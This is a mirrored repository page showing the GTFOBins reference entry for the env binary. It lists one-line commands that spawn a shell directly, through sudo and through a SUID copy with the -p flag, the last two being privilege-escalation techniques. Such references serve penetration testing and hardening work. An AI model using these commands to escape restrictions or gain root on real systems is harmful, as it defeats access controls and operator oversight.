1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-19 13:56:03 +02:00
GTFOBins.github.io/_gtfobins/env.md
2018-05-21 20:14:41 +01:00

9 lines
152 B
Markdown

---
functions:
exec-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
suid-enabled:
- code: ./env /bin/sh -p
---